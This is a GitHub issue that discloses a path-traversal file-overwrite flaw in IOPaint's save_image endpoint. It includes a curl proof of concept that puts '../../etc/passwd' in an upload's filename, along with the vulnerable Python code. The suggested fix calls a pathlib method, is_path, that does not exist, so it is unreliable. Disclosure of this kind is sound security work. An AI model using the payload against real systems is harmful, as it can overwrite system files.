search

Sanster / IOPaint

Image inpainting tool powered by SOTA AI Model. Remove any unwanted object, defect, people from your pictures or erase and replace(powered by stable diffusion) any thing on your pictures.
https://www.iopaint.com/
Apache License 2.0
19.24k stars 1.97k forks source link

[BUG] Critical CVE File Overwrite #585

Open caeroltheplasmoid opened 3 hours ago

caeroltheplasmoid commented 3 hours ago

Model Which model are you using?

Describe the bug A clear and concise description of what the bug is. CVE type: File Overwrite URL: http://localhost:8080/api/v1/save_image

Poc: curl -X POST "http://localhost:8080/api/v1/save_image" -F "file=@file.mp4;filename=../../etc/passwd;"

Error is going here:

def api_save_image(self, file: UploadFile):
        filename = file.filename

        origin_image_bytes = file.file.read()
        with open(self.config.output_dir / filename, "wb") as fw:
            fw.write(origin_image_bytes)

No check for filename, therefore it's user-controlled. Basically, we can't name our files like "../../something", but it's not the case when we're using curl.

Screenshots If applicable, add screenshots to help explain your problem.

System Info Software version used

caeroltheplasmoid commented 3 hours ago

Solution: it can be easily fixed with Pathlib's checking is_path. pathlib.Path(filename).is_path() Gonna create PR